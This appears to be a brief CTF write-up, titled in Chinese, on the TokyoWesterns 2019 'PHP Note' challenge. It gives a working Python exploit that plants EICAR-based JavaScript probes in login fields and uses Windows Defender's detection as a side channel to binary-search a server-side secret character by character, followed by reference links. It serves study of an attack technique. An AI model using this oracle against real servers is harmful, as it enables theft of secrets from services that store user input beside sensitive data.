Windows Defender 侧信道攻击

<script>
// `body` is read from the page but never used in this minimal snippet.
var body = document.body.innerHTML;
// The EICAR anti-virus test string: harmless by itself, but scanners are expected to flag it.
var mal = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
// NOTE(review): presumably the point is that a scanner which emulates the script
// sees the test string as the argument of eval() and flags the file. Confirm against
// the write-ups linked at the end of the page.
eval(mal);
</script>
<body></body>

import requests

# Base URL of the CTF challenge instance used in the write-up; the author's
# trailing note marks it as a value to replace.
URL = "http://phpnote.chal.ctf.westerns.tokyo" # changeme

def trigger(c, idx):
    """Build the HTML/JavaScript probe for a single comparison.

    The generated script reads the character at position ``idx`` of
    ``document.body.innerHTML`` and passes its code ``n`` to ``f``. Inside
    ``f`` a one-entry table ``{c: '*'}`` is indexed with ``Math.min(c, n)``,
    so the final ``*`` of the EICAR test string is appended only when
    ``n >= c``; otherwise the lookup yields ``undefined`` and the string
    passed to ``eval`` is not the test signature.

    Args:
        c: threshold character code being compared against.
        idx: index into ``document.body.innerHTML`` of the character tested.

    Returns:
        The probe markup with ``c`` and ``idx`` substituted in.
    """
    import string

    # ``$$`` is string.Template's escape for a literal ``$``; ``${c}`` and
    # ``${idx}`` are the only placeholders.
    probe = string.Template(
        '''<script>f=function(n){eval('X5O!P%@AP[4\\\\PZX54(P^)7CC)7}$$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$$H+H'+{${c}:'*'}[Math.min(${c},n)])};f(document.body.innerHTML[${idx}].charCodeAt(0));</script><body>'''
    )
    return probe.substitute(c=c, idx=idx)

def leak(idx):
    """Recover one character by binary search over codes 0..0xFF.

    Each step builds a probe with ``trigger(mid, idx)`` and submits it as
    ``realname`` twice in a fresh session: first with an empty ``nickname``,
    then with ``nickname`` set to ``'</body>'``. When the second response
    contains ``/?action=login`` the lower bound moves up to ``mid``;
    otherwise the upper bound moves down.

    NOTE(review): the response check is the only observable used here.
    Presumably the application falls back to its login page because the
    scanner acted on the stored session data once the probe's comparison
    was true. Confirm against the referenced write-ups. If that reading is
    right, the oracle exists because user-controlled fields and the secret
    share one stored blob that the scanner inspects.

    Args:
        idx: position of the character to recover.

    Returns:
        The recovered character, as ``chr`` of the final lower bound.
    """
    low, high = 0, 0x100
    while high - low > 1:
        mid = (high + low) // 2
        probe = trigger(mid, idx)
        login_url = URL + '/?action=login'
        session = requests.session()
        session.post(login_url, data={'realname': probe, 'nickname': ''})
        reply = session.post(login_url, data={'realname': probe, 'nickname': '</body>'})
        if "/?action=login" in reply.content:
            low = mid
        else:
            high = mid
    return chr(low)

# Recover the first 100 positions one character at a time, then print the result.
data = ''.join(leak(i) for i in range(100))
print(data)

参考

https://blog.zeddyu.info/2019/09/17/windows-defender/

https://r3kapig.com/writeup/20190904-tokyowesterns/#php-note

https://balsn.tw/ctf_writeup/20190831-tokyowesternsctf/#php-note

https://xz.aliyun.com/t/6216
